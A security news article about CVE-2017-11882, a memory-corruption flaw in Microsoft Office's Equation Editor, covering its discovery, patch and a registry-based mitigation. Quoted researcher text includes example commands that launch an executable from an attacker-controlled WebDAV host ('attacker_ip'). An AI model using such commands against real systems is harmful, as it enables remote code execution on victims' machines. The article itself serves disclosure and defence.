17-Year-Old MS Office flaw CVE-2017-11882 could be exploited to remotely install malware without victim interaction

Ops, a 17-Year-Old flaw in MS Office, tracked as CVE-2017-11882, could be exploited by remote attackers to install a malware without user interaction.

Ops, a 17-Year-Old vulnerability in MS Office could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability, tracked as CVE-2017-11882, was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and affects Microsoft Office 2007 and later because the component was maintained to maintain the backward compatibility.

To exploit the vulnerability, an attacker needs to trick victims into opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
The attacker can gain full control on the target system by chaining the vulnerability with Windows Kernel privilege escalation exploits like CVE-2017-11847.

Researcher at Embedi researchers described several attack scenarios :

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).” states the analysis published by Embedi.

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Microsoft has addressed the vulnerability with the November Patch Tuesday release, the tech giant has changed the way the affected component handles objects in memory.

The experts warn of the presence of many security issued in this vulnerable Office component and suggest disabling it to avoid problems.

To disable the component it is very simple, just type the following command in the command prompt:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, the command to run is:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

Microsoft users should also enable Protected View to prevent active content execution (OLE/ActiveX/Macro).

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – CVE-2017-11882, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]